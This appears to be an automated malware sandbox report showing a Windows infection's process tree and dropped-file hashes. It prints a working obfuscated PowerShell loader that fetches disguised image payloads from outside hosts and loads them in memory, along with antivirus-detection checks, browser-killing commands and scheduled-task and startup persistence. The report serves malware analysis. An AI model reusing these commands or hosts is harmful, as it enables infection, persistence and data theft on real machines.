Bn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@C@@d@B4@HQ@LgBk@GU@QQBt@Go@ZwBu@C8@cwBl@Gw@aQBm@F8@YwBp@Gw@YgB1@H@@Lw@y@DE@MQ@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                          7⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:824
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfhgdf/hfgjew/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.deAmjgn/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                            8⤵
                            • Blocklisted process makes network request
                            • Command and Scripting Interpreter: PowerShell
                            • Suspicious behavior: EnumeratesProcesses
                            PID:1120
                  • C:\Users\Admin\AppData\Local\Temp\10142270101\4jblLC1.exe
                    "C:\Users\Admin\AppData\Local\Temp\10142270101\4jblLC1.exe"
                    4⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:2972
                  • C:\Users\Admin\AppData\Local\Temp\10142280101\XxzH301.exe
                    "C:\Users\Admin\AppData\Local\Temp\10142280101\XxzH301.exe"
                    4⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:1956
                  • C:\Users\Admin\AppData\Local\Temp\10142290101\ReK7Ewx.exe
                    "C:\Users\Admin\AppData\Local\Temp\10142290101\ReK7Ewx.exe"
                    4⤵
                    • Executes dropped EXE
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    PID:2708
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c expand Ae.msi Ae.msi.bat & Ae.msi.bat
                      5⤵
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:2756
                      • C:\Windows\SysWOW64\expand.exe
                        expand Ae.msi Ae.msi.bat
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:2200
                      • C:\Windows\SysWOW64\tasklist.exe
                        tasklist
                        6⤵
                        • Enumerates processes with tasklist
                        • System Location Discovery: System Language Discovery
                        PID:1988
                      • C:\Windows\SysWOW64\findstr.exe
                        findstr /I "opssvc wrsa"
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:3028
                      • C:\Windows\SysWOW64\tasklist.exe
                        tasklist
                        6⤵
                        • Enumerates processes with tasklist
                        • System Location Discovery: System Language Discovery
                        PID:748
                      • C:\Windows\SysWOW64\findstr.exe
                        findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:1692
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c md 789919
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:556
                      • C:\Windows\SysWOW64\extrac32.exe
                        extrac32 /Y /E Deviation.msi
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:2160
                      • C:\Windows\SysWOW64\findstr.exe
                        findstr /V "Brian" Challenges
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:1384
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c copy /b 789919\Occupation.com + Kate + Invisible + Tells + Gross + Amend + Foul + Snowboard + Digital + Fraud 789919\Occupation.com
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:2264
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c copy /b ..\Drug.msi + ..\Contributors.msi + ..\Anthropology.msi + ..\Activities.msi + ..\Opens.msi + ..\Having.msi + ..\Dimension.msi + ..\Responding.msi + ..\Series.msi + ..\Salem.msi q
                        6⤵
                        • System Location Discovery: System Language Discovery
                        PID:1860
                      • C:\Users\Admin\AppData\Local\Temp\789919\Occupation.com
                        Occupation.com q
                        6⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:2700
                        • C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe
                          C:\Users\Admin\AppData\Local\Temp\789919\RegAsm.exe
                          7⤵
                            PID:1096
                        • C:\Windows\SysWOW64\choice.exe
                          choice /d y /t 5
                          6⤵
                          • System Location Discovery: System Language Discovery
                          PID:2028
                    • C:\Users\Admin\AppData\Local\Temp\10142300101\V0Bt74c.exe
                      "C:\Users\Admin\AppData\Local\Temp\10142300101\V0Bt74c.exe"
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      PID:1600
                      • C:\Users\Admin\AppData\Local\Temp\10142300101\V0Bt74c.exe
                        "C:\Users\Admin\AppData\Local\Temp\10142300101\V0Bt74c.exe"
                        5⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:2952
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 2952 -s 1028
                          6⤵
                          • Loads dropped DLL
                          • Program crash
                          PID:2668
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1600 -s 500
                        5⤵
                        • Loads dropped DLL
                        • Program crash
                        PID:2836
                    • C:\Users\Admin\AppData\Local\Temp\10142310101\yUI6F6C.exe
                      "C:\Users\Admin\AppData\Local\Temp\10142310101\yUI6F6C.exe"
                      4⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2684
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 1200
                        5⤵
                        • Loads dropped DLL
                        • Program crash
                        PID:888
                    • C:\Users\Admin\AppData\Local\Temp\10142320101\ADFoyxP.exe
                      "C:\Users\Admin\AppData\Local\Temp\10142320101\ADFoyxP.exe"
                      4⤵
                      • Executes dropped EXE
                      • Drops file in Windows directory
                      • System Location Discovery: System Language Discovery
                      PID:3032
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
                        5⤵
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        PID:2680
                        • C:\Windows\SysWOW64\expand.exe
                          expand Go.pub Go.pub.bat
                          6⤵
                          • System Location Discovery: System Language Discovery
                          PID:1604
                        • C:\Windows\SysWOW64\tasklist.exe
                          tasklist
                          6⤵
                          • Enumerates processes with tasklist
                          • System Location Discovery: System Language Discovery
                          PID:2960
                        • C:\Windows\SysWOW64\findstr.exe
                          findstr /I "opssvc wrsa"
                          6⤵
                          • System Location Discovery: System Language Discovery
                          PID:1992
                        • C:\Windows\SysWOW64\tasklist.exe
                          tasklist
                          6⤵
                          • Enumerates processes with tasklist
                          • System Location Discovery: System Language Discovery
                          PID:1900
                        • C:\Windows\SysWOW64\findstr.exe
                          findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                          6⤵
                          • System Location Discovery: System Language Discovery
                          PID:2060
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c md 353090
                          6⤵
                          • System Location Discovery: System Language Discovery
                          PID:2040
                        • C:\Windows\SysWOW64\extrac32.exe
                          extrac32 /Y /E Really.pub
                          6⤵
                          • System Location Discovery: System Language Discovery
                          PID:2064
                        • C:\Windows\SysWOW64\findstr.exe
                          findstr /V "posted" Good
                          6⤵
                          • System Location Discovery: System Language Discovery
                          PID:992
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
                          6⤵
                          • System Location Discovery: System Language Discovery
                          PID:2576
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
                          6⤵
                          • System Location Discovery: System Language Discovery
                          PID:2696
                        • C:\Users\Admin\AppData\Local\Temp\353090\Seat.com
                          Seat.com m
                          6⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          PID:824
                          • C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
                            C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
                            7⤵
                              PID:1708
                          • C:\Windows\SysWOW64\choice.exe
                            choice /d y /t 5
                            6⤵
                            • System Location Discovery: System Language Discovery
                            PID:2872
                      • C:\Users\Admin\AppData\Local\Temp\10142330101\zY9sqWs.exe
                        "C:\Users\Admin\AppData\Local\Temp\10142330101\zY9sqWs.exe"
                        4⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Drops file in Windows directory
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of FindShellTrayWindow
                        PID:1724
                        • C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe
                          "C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"
                          5⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:2936
                      • C:\Users\Admin\AppData\Local\Temp\10142340101\CgmaT61.exe
                        "C:\Users\Admin\AppData\Local\Temp\10142340101\CgmaT61.exe"
                        4⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2244
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 1188
                          5⤵
                          • Program crash
                          PID:2180
                      • C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe
                        "C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe"
                        4⤵
                          PID:2060
                          • C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe
                            "C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe"
                            5⤵
                              PID:1624
                            • C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe
                              "C:\Users\Admin\AppData\Local\Temp\10142350101\mAtJWNv.exe"
                              5⤵
                                PID:2656
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 500
                                5⤵
                                • Program crash
                                PID:2928
                            • C:\Users\Admin\AppData\Local\Temp\10142360101\3df5e5788d.exe
                              "C:\Users\Admin\AppData\Local\Temp\10142360101\3df5e5788d.exe"
                              4⤵
                                PID:2924
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 1188
                                  5⤵
                                  • Program crash
                                  PID:560
                              • C:\Users\Admin\AppData\Local\Temp\10142370101\75c1ef65a5.exe
                                "C:\Users\Admin\AppData\Local\Temp\10142370101\75c1ef65a5.exe"
                                4⤵
                                  PID:2660
                                • C:\Users\Admin\AppData\Local\Temp\10142380101\775a1069e0.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10142380101\775a1069e0.exe"
                                  4⤵
                                    PID:2428
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM firefox.exe /T
                                      5⤵
                                      • Kills process with taskkill
                                      PID:1820
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM chrome.exe /T
                                      5⤵
                                      • Kills process with taskkill
                                      PID:1948
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /F /IM msedge.exe /T
                                      5⤵
                                      • Kills process with taskkill
                                      PID:2160
                                  • C:\Users\Admin\AppData\Local\Temp\10142390101\b71d0f89d2.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10142390101\b71d0f89d2.exe"
                                    4⤵
                                      PID:1500
                                    • C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
                                      "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
                                      4⤵
                                        PID:2752
                                        • C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe
                                          "C:\Users\Admin\AppData\Local\Temp\10142400101\PfOHmro.exe"
                                          5⤵
                                            PID:2056
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2752 -s 500
                                            5⤵
                                            • Program crash
                                            PID:1560
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
                                      2⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1696
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks.exe /create /tn "Consider" /tr "wscript //B 'C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js'" /sc minute /mo 5 /F
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:876
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & echo URL="C:\Users\Admin\AppData\Local\EduGenius Studios Co\EduGeniusX.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EduGeniusX.url" & exit
                                      2⤵
                                      • Drops startup file
                                      • System Location Discovery: System Language Discovery
                                      PID:3008
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /c schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
                                      2⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1668
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks.exe /create /tn "Coast" /tr "wscript //B 'C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js'" /sc minute /mo 5 /F
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:2044
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\Admin\AppData\Local\TradeSecure Innovations\TradeHub.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
                                      2⤵
                                      • Drops startup file
                                      • System Location Discovery: System Language Discovery
                                      PID:2240
                                  • C:\Windows\system32\taskeng.exe
                                    taskeng.exe {BFC21C78-FBF1-4301-AE56-0E242F63A1C2} S-1-5-21-677481364-2238709445-1347953534-1000:JXXXDSWS\Admin:Interactive:[1]
                                    1⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:984
                                    • C:\ProgramData\WMIsys\CONAtdrive.exe
                                      C:\ProgramData\WMIsys\CONAtdrive.exe
                                      2⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      PID:1692
                                    • C:\ProgramData\WMIsys\CONAtdrive.exe
                                      C:\ProgramData\WMIsys\CONAtdrive.exe
                                      2⤵
                                        PID:2220

                                    Network

                                    MITRE ATT&CK Enterprise v15

                                    Replay Monitor

                                    Loading Replay Monitor...

                                    Downloads

                                    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                                      Filesize

                                      71KB

                                      MD5

                                      83142242e97b8953c386f988aa694e4a

                                      SHA1

                                      833ed12fc15b356136dcdd27c61a50f59c5c7d50

                                      SHA256

                                      d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

                                      SHA512

                                      bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6Z504R1Z\soft[1]

                                      Filesize

                                      987KB

                                      MD5

                                      f49d1aaae28b92052e997480c504aa3b

                                      SHA1

                                      a422f6403847405cee6068f3394bb151d8591fb5

                                      SHA256

                                      81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0

                                      SHA512

                                      41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7ZQSKFIX\service[1].htm

                                      Filesize

                                      1B

                                      MD5

                                      cfcd208495d565ef66e7dff9f98764da

                                      SHA1

                                      b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                      SHA256

                                      5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                      SHA512

                                      31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                    • C:\Users\Admin\AppData\Local\Temp\10142150101\XxzH301.exe

                                      Filesize

                                      262KB

                                      MD5

                                      36105cc7aff011ef834f9e83717f9ab1

                                      SHA1

                                      9b5a1a9da2f1e22ae23517c45b82c734a5793ded

                                      SHA256

                                      36263b9d2418efa92ba637974cfed268437354d88be78814354c5d47337890c2

                                      SHA512

                                      38662724ed70d768ff19ed260f17593a956858ee5aedd4d4178f895bf3ca39181983d8310acc6aa203223518fa7394e64829832b380121a86360120aab66ba50

                                    • C:\Users\Admin\AppData\Local\Temp\10142170101\4189e09c15.exe

                                      Filesize

                                      2.9MB

                                      MD5

                                      f60c4315a77f0a2f050c3e60d7fbe975

                                      SHA1

                                      d577a187304ace9ba700e13f9dd66e851efaffef

                                      SHA256

                                      31b7a2eee7649ee4c871b556a23022a126092ba8bc3b07d2fe28f6cafa6ffcfd

                                      SHA512

                                      ff7e726e1bf4955c1237ece1ecbbecd194d626474daad0536b21ca27efbd950b2816ac25b22c2b57cf6798c4eabd03ffbca45b1f0208544181d974553649b11e

                                    • C:\Users\Admin\AppData\Local\Temp\10142180101\4jblLC1.exe

                                      Filesize

                                      1.7MB

                                      MD5

                                      c70ba9b3fc03b137ac57e9f9eb7f669b

                                      SHA1

                                      188d35cc8f3e888aacd4a03aaac5979fa7680b01

                                      SHA256

                                      d7c6199beb7718942d7fa14f3bebdae21a1142d7ccdbf4486f79c04228a873b7

                                      SHA512

                                      30efb384601044f0de192d3ae6de6d90e2dc6d260cabaf35ad27c74d3181ddf3de7e47d0c0778cbc7ec00a5fabdd2a804889357353511fe6c8200267f2a3e585

                                    • C:\Users\Admin\AppData\Local\Temp\10142200101\2cd9a90288.exe

                                      Filesize

                                      3.8MB

                                      MD5

                                      c9e0574f5278149157f8cd14ad266886

                                      SHA1

                                      3b1671a65d6ed7beda7001eaf7b239bf153012cd

                                      SHA256

                                      98ffb7534eb707b6d086ff3c049a424d19256056c43e09945097dae5538a7eb9

                                      SHA512

                                      ec409f1f3b4484574697877c56253e19f2f0c189b8ba0a1cd3e64e1dedc7876cf3a604f0d2496bedfaf20ca1c115055431cd6f7e443189b4ff2a1fb67f32289a

                                    • C:\Users\Admin\AppData\Local\Temp\10142210101\0102b962a1.exe

                                      Filesize

                                      1.8MB

                                      MD5

                                      3a684b497af86498fe2f8dc4c392cc51

                                      SHA1

                                      ad86b1d97c75406c52864b02eb981e6511ac835e

                                      SHA256

                                      f832a90b90aed49ea52fabccce43ef1db001f732a01705346503581a6dd68dd8

                                      SHA512

                                      ca4a6558fc0e8996beaaabd809b2978c4f26148adf796031948fc472ac7c49d755c331d5698b0037832fc132e8d620a926a1c20631d2d47af610904bf7f3290c

                                    • C:\Users\Admin\AppData\Local\Temp\10142220101\516d293752.exe

                                      Filesize

                                      4.5MB

                                      MD5

                                      16bcdf9f515993aa3f2e6e33fd867768

                                      SHA1

                                      750d69459a107b7fc45a2073895a51f0d211415d

                                      SHA256

                                      873565936ff2ecf66e4efc7c211f555589deea3b94474e65fc5c9ca712a61d3e

                                      SHA512

                                      9bca85e004363ac6a554c1120e02f82f4af4cc8c439a40166883eb0c290d636087a3f31200d25bfaff14351e9d0593d7f7d9725f82d7037e4ca47f920347b430

                                    • C:\Users\Admin\AppData\Local\Temp\10142230101\3a084e6b3d.exe

                                      Filesize

                                      364KB

                                      MD5

                                      9dd7f35baa732ab9c19737f7574f5198

